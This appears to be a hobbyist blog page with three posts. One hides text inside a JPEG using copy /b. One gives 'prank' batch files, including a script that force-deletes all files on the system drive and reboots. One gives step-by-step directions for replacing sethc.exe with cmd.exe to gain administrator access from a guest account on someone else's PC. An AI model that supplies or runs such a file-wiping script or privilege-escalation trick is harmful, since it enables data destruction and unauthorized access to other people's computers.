Thursday, June 12, 2014

HOW TO HIDE TEXT IN IMAGE FILE

Hi Guys.
Today we will see how to hide Text
Message in any image file.

This is an awesome trick and very easy one too.

IF you wish to send a text message to you friends privately or you yourself want to hide a text message in image file then this article will help you a lot.

After hiding the message in a image file there will be no damage to the file just the size of the file will increase a bit.

So lets check how it is done.

*First of all open run and type cmd., click enter.

*This will open Command promt.

*Now you have to navigate to the folder where you have copied the files(1 .jpg file and 1 txt file which
contains your message.)

For example, if your files are in “D” drive, then after opening cmd, type, D: and hit enter, now you are in your d drive, now if your folder name is
Photos then type “cd photos” (without quotes) now you are in photos folder.

*Now main step. Type this command after navigating to the folder. copy /b imagefilename.jpg + textfilename.txt
outputimagename.jpg

*Type the exact code, but dont forgot to replace the few words, imagefilename.jpg with your image
file name and with proper extension,
textfilename.txt with your text file,
outputimagename.jpg your output image name, use whatever you want, but remember to use right
extension.

*All done by now your message has been hidden in you image and a new folder will be created in the same folder with the name you wrote in place of outputimagename.jpg.

*As everything is done by now. you must be thinking how to view the message now. don't worry we will see that too. its very simple .

You just have to open the output file with notepad , scroll down to the bottom. check the last line.
you message will be displayed there.

Friday, December 13, 2013

Funny BAT Files for Pranks or Serious Damage to a PC

1) The Blue-Death Screen – Show the Fatal Blue Screen Error [Dangerous, do NOT try it at your own PC]

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2) Stupid Shutdown – Shows a funny Error and shutdowns the PC

@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10

Thursday, November 14, 2013

HOW TO KNOW "ADMIN PArSSWORD" THROUGH GUEST ACCOUNT

Hello guys, Today will provide you 2 awesome and easy trick through which you can hack admin account through guest account.

If you been using someones Pc in guest account and want to have Admin privilage then worry not,there is a trick for you to Gain Admin Privilage .
lets get started with it.
Method 1.

1) Go to C:/windows/system32.

2) Copy cmd.exe and paste it on desktop.

3) Rename cmd.exe to sethc.exe.

4) Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

5) Now Log out from your guest account and at the user select window,press shift key 5 times.

6) Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.